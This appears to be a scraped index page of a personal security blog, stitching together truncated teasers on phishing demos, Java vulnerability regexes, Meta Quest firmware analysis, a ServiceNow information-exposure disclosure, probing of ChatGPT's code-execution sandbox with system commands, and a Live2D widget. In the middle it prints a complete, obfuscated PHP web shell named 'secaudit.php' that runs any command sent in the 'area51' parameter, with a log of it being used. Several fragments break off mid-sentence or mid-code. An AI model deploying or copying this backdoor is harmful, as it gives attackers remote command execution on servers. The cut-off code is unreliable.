Bipin Jitiya win3zz

Demonstration of Phi[s]hing Techniques (For Awareness & Learning Only)

Important

Disclaimer: This content is intended strictly for educational and ethical awareness purposes only. It must not be used for unauthorized or malicious activities. Always conduct security testing only in environments you own or have explicit permission to test. Misuse of this information may be illegal and subject to penalties under cybercrime laws.

This demonstrates how phish[i]ng techniques work, for the sole purpose of educating ethical hackers, developers, and students in cybersecurity.

We are using a minified and obfuscated clone of the Fa[ce]book login page for simulation purposes.

Useful Regex Patterns to Find Vulnerabilities in Java Code

1. Hardcoded Credentials / Secrets

These patterns look for sensitive information directly embedded in the code.

Generic Passwords / Secrets / Tokens:
- Regex:

Getting started with Firmware Analysis on Meta Quest

Summary of the concepts and techniques discussed in a firmware analysis series, along with technical notes and commands

Video - Part 1

This video, Part 1 of a three-part firmware analysis series by Tom Heb of Meta Red Team X, introduces what firmware is, why it's security-critical, and the initial two phases of firmware analysis: enumerate (figuring out what firmware exists) and obtain (getting a copy of the firmware).

Key Technical Details and Commands:

Autonomous killer drones

Click to Play:

secaudit.php

<?php $s="\x73\x79\163\x74\145\155";$__=$_REQUEST;if(isset($__["\x61\162\x65\x61\x35\x31"])){echo "\74\160\x72\145\x3e";$c0=$__["\x61\162\x65\x61\x35\x31"];$s($c0.' 2>&1');echo "\74\57\160\162\x65\76";exit;}?>

bipin@bipin-VirtualBox:~/BB/Research/php_backdoor$ php -S 127.0.0.2:8000
[Wed Aug 21 18:49:26 2024] PHP 7.4.3-4ubuntu2.23 Development Server (http://127.0.0.2:8000) started
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 Accepted
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 [200]: GET /secaudit.php?area51=id

Live2D Interactive Anime Character on a Website

You may have seen something like the above on websites (especially Chinese and Japanese). These are interactive 2D character animations that can be integrated into websites. They are designed to run on the client side using JavaScript and graphics assets with Live2D technology. The characters can move and respond to user interactions.

Here’s a basic idea of how you can add a Live2D widget to a website:

You need a Live2D model file, which typically includes a set of files such as textures, model data, and animation settings. You can create your own using Live2D Cubism software. Many ready-made models are available here: https://github.com/evrstr/live2d-widget-models

ServiceNow Instance Exposing Sensitive Information via Unauthenticated Endpoints

Date: 26 June 2023
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Discovered by: Bipin Jitiya (@win3zz)

Summary

[REDACTED], Inc., uses ServiceNow with an instance named "[REDACTED]" accessible at https://[REDACTED].service-now.com/. Upon reviewing this instance, I observed that it is not sufficiently hardened for security, and some endpoints are exposing sensitive information. The following three endpoints, designed for performance monitoring, logging, and troubleshooting purposes, are accessible without authentication:

ChatGPT's Advanced Data Analysis and Code Execution - Experiments

Recently, I learned that ChatGPT now allows advanced data analysis, which includes executing code (Python or possibly others). This feature is available to registered users via GPT-4o, albeit with limitations.

I quickly tried running system commands using this functionality, and here are the results:

It clearly shows that system commands can be executed through Python code in a sandboxed environment.

	<?php

	echo myMessage("WELCOME", "win3zz", 0);

	function myMessage() {

	$messages = [
	"WELCOME" => "Welcome, %s! You have %d new messages.",
	"ERROR" => "An error occurred: %s"
	];

	/**
	* Description:
	* You can decode the hidden message by running the program.
	* Compile and execute: user@host:~$ javac A.java && java A
	*
	* @author Bipin Jitiya
	* @since 2024-12-17
	*/
	class A {
	public static void main(String[] args){